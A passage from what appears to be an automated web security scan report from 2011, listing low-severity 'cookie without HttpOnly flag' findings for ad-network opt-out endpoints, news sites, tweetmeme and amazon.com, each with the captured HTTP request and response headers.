Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:04:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1687865702
Location: http://advertising.aol.com/token/6/3/1687865702/
Expires: Sun, 04 Sep 2011 11:04:08 GMT
Content-Length: 0
Content-Type: text/html


16.6. http://nai.adserverwc.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:04:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1922969445
Location: http://advertising.aol.com/token/7/3/1922969445/
Expires: Sun, 04 Sep 2011 11:04:59 GMT
Content-Length: 0
Content-Type: text/html


16.7. http://nai.adsonar.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:05:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=434026777
Location: http://advertising.aol.com/token/1/3/434026777/
Expires: Sun, 04 Sep 2011 11:05:01 GMT
Content-Length: 0
Content-Type: text/html


16.8. http://nai.adtech.de/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC156E651A4418BD90FFF0106094

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:04:38 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=158356570
Location: http://advertising.aol.com/token/3/3/158356570/
Expires: Sun, 04 Sep 2011 11:04:39 GMT
Content-Length: 0
Content-Type: text/html


16.9. http://nai.advertising.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=MTMxNTA5NzMwOTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; ACID=Rq690013151032380008; C2=HIuYO9aFHYIiGD8sQdwSkaMwSKMCdbdRrxK4IEscGAHtnggnraAc; F1=Bgg4i5EBAAAABAAAAIAAgEA; BASE=oTwUjn8fYrESn1x8Qj3fRMC!; ROLL=XpwfbsHr/Y/PQCLUeRRTttG!; aceRTB=rm%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Cam%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Cdc%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Can%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7Crub%3DTue%2C%2004%20Oct%202011%2002%3A28%3A00%20GMT%7C

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:04:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=154978535
Location: http://advertising.aol.com/token/0/3/154978535/
Expires: Sun, 04 Sep 2011 11:04:04 GMT
Content-Length: 0
Content-Type: text/html


16.10. http://nai.glb.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:04:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1074350551
Location: http://advertising.aol.com/token/8/3/1074350551/
Expires: Sun, 04 Sep 2011 11:04:51 GMT
Content-Length: 0
Content-Type: text/html


16.11. http://nai.tacoda.at.atwola.com/nai/daa.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eadx=x; ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:05:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=459941398
Location: http://advertising.aol.com/token/2/3/459941398/
Expires: Sun, 04 Sep 2011 11:05:18 GMT
Content-Length: 0
Content-Type: text/html


16.12. http://optout.mookie1.com/optout/nai/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://optout.mookie1.com
Path:   /optout/nai/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout/nai/?action=optout&nocache=0.6832982 HTTP/1.1
Host: optout.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; id=4612741554684080402; mdata=1|4612741554684080402|1315103146; NSC_pqupvu_qppm_iuuq=ffffffff0941323f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:16:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA"
Set-Cookie: id=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: name=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: id=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: session=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: mdata=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: OAX=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.mookie1.com
Set-Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; expires=Sat, 31-Aug-2024 11:16:14 GMT; path=/; domain=.mookie1.com
Set-Cookie: optouts=cookies; expires=Sat, 31-Aug-2024 11:16:14 GMT; path=/; domain=.mookie1.com
Set-Cookie: RMOPTOUT=3; expires=Sat, 31-Aug-2024 11:16:14 GMT; path=/; domain=.mookie1.com
Location: /optout/nai/index.php?action=optout&nocache=0.6832982&check_cookie=true
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.13. http://pixel.adsafeprotected.com/jspix  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jspix?anId=140&pubId=11479&campId=4726 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C73BD05297FFA8CC9F96289B5720F79; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:45 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
...[SNIP]...

16.14. http://search.spotxchange.com/vast/2.00/75606  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://search.spotxchange.com
Path:   /vast/2.00/75606

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vast/2.00/75606?VPAID=1&content_page_url=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2FMy-friend-Ganesha%2Farticleshow%2F9855193.cms&VMaxd=30&linear=1&_rand=7937 HTTP/1.1
Host: search.spotxchange.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTQ5NzczMjkK

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:19:52 GMT
Server: Apache
P3P: CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV ADMa"
Set-Cookie: history-0=eNrVUMtugzAQPKf%2F0srghIjcQjHEqGCVOGB8I4YIAwGkvoK%2Fvg6k7Q%2B0hx53Z2d2ZujWfzAMY7nYONbyfo9ivH3CHLmbjPaKdK%2BK1EgRGQBx9urcbN%2B4YYOSOS2ur1ho4S6u%2BIjXQvWX0O1lziJVpMmJ%2Bx7ge7zOqd4rBAgVMFR4RWBoRbSXxdl7KdKDJCayonqY%2BaqXWRqbnAVA67SitQf%2BOGkDIrEZuQLOf5GpPTUZiysGnfEI%2BcD9ZGRm28z41sLyx5PYBe8cBtUx%2BdYzNF8JX2eZ56seyNLilKfP2lNjhRRdInf6tfzCxDmpebqqy8Ruy50ziK653eKPKZf2X%2Fhex2Cirtm1rpq5QhJo2As6t736%2B7bdZozcA%2FhXbdPfbfvuEyw79EU%3D; expires=Mon, 02-Jan-2012 03:19:52 GMT; path=/; domain=.spotxchange.com
Set-Cookie: partner-0=eNptzMEKgjAYAOBzvUtg21gldDBmstH2ow7dvOUgmGV2CGR7%2BsRz1%2B%2FwUXI6btILJbs6r3h2413OUqunCO9vhCHH4MVsjUj6sQkGN7Ez4tEV18TW%2FODiNIPnHrCkUmeUjw1xxStYU316RDyg5%2BIyKF1iqTlSw3ru%2F533tlwfYJOX2gXJMqSYWyw5b38XazTo; expires=Mon, 02-Jan-2012 03:19:52 GMT; path=/; domain=.spotxchange.com
Set-Cookie: session-0=deleted; expires=Sat, 04-Sep-2010 03:19:51 GMT; path=/; domain=.spotxchange.com
Set-Cookie: user-0=dXNlcl9ndWlkCTk2NDgyYjhkZTEyYThhMjlhN2U3NjkyMzlmZGY0M2E1CWNvb2tpZV9kb21haW4Jc2VhcmNoLnNwb3R4Y2hhbmdlLmNvbQljcmVhdGVkX2RhdGUJMTMxNDg0NzQ1Mwltb2RpZmllZF9kYXRlCTEzMTUxMDYzOTIK; expires=Tue, 04-Sep-2012 03:19:52 GMT; path=/; domain=.spotxchange.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 03:19:52 GMT
Cache-Control: no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
Content-Length: 67

<?xml version="1.0" encoding="UTF-8" ?>
<VAST version="2.0"></VAST>

16.15. http://shopping.indiatimes.com/ism/faces/tracker.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shopping.indiatimes.com
Path:   /ism/faces/tracker.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ism/faces/tracker.jsp HTTP/1.1
Host: shopping.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Sun, 04 Sep 2011 04:18:41 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.23
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Set-Cookie: JSESSIONID=644D478015FB3E5E8823654476B2CA38.node4; Path=/
Location:
Content-Language: en
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1


16.16. http://tag.admeld.com/nai-opt-out  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tag.admeld.com
Path:   /nai-opt-out

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai-opt-out?nocache=0.672114 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=14c82149-9fc3-4277-af4b-df6e89b3fc47; D41U=3qBdjM8Fc6wmKGyDniBhVEEJ9ADx4miPR-XDn6vDrZGUndukkKo3FXw

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: /nai-test-opt-out
Content-Length: 201
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 04 Sep 2011 11:12:41 GMT
Connection: close
Set-Cookie: admeld_opt_out=true;expires=Sun, 01 Jan 2017 05:00:00 GMT;path=/;domain=tag.admeld.com;
Set-Cookie: meld_sess=delete;expires=Fri, 04 Jul 2008 01:26:01 GMT;path=/;domain=tag.admeld.com;
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="/nai-test-opt-out">here</a>.</p>
</body></html>
...[SNIP]...

16.17. http://thestar.com.my/news/story.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://thestar.com.my
Path:   /news/story.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/story.asp HTTP/1.1
Host: thestar.com.my
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:15:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 42547
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACQRSBDS=IKFLHFGBCIHPNCLAHHONEOEJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...

16.18. http://tweetmeme.com/auth/login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tweetmeme.com
Path:   /auth/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/login HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 04:21:37 GMT
Content-Type: text/html
Connection: close
P3p: CP="CAO PSA"
Location: https://api.twitter.com/oauth/authenticate?oauth_token=JopzL08YmnXcSkRB4sZGQfGgok9Ywrkzp3I3iV4kY2A
Set-Cookie: oauth_token_secret=cEJPKXiGuS3XkqW0zZ9O3hPfdqAokswwe8GRZuIWhs; path=/auth/; domain=.tweetmeme.com
X-Ads-Served-In: 7.8916549682617E-5
X-Served-In: 0.65290689468384
X-Served-By: h02
Content-Length: 0


16.19. http://twitterapi.indiatimes.com/feedtweet/tweet  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitterapi.indiatimes.com
Path:   /feedtweet/tweet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /feedtweet/tweet HTTP/1.1
Host: twitterapi.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:20:14 GMT
Server: Apache/2.2.9 (Unix) DAV/2 mod_jk/1.2.25
Set-Cookie: JSESSIONID=788EEB6266D73155B2D8DB46D780C84A; Path=/feedtweet
Content-Length: 36
Connection: close
Content-Type: text/html


Please enter the story link

16.20. http://www.amazon.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:16 GMT
Server: Server
Set-Cookie: skin=noskin; path=/; domain=.amazon.com; expires=Sun, 04-Sep-2011 04:23:16 GMT
x-amz-id-1: 19A6WP3ZDHGN69NMDWGD
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: WttjoioY2sh+9lVqwvX+MQ2r9X2rIBXb/ay0wwdr2lLUBl2LD2VMSFtd29Gdj24p
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 211142


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<!-- oi -->
<script type='text/
...[SNIP]...

16.21. http://www.amazon.com/b  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /b

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Sun, 04 Sep 2011 04:23:35 GMT
Server: Server
x-amz-id-1: 10YG7PBC9G2X0E2YBFHB
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: B2gh2NGkiIjoM7fXpribhv/w7Jst9jbtcB8VXmNGv3+FbrPoGaX9uVyUSP7JMkuX
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 20052


<html>
<head>
<!-- oi -->
<script type='text/javascript'><!--
var t0_date = new Date();
var ue_t0 = t0_date.getTime();
//--></script>
<script type='text/javascript'><!--
var ue_id = '10YG7PBC9G2X0
...[SNIP]...

16.22. http://www.amazon.com/dp/0307387178  previous  next

Summary

Severity:   Low
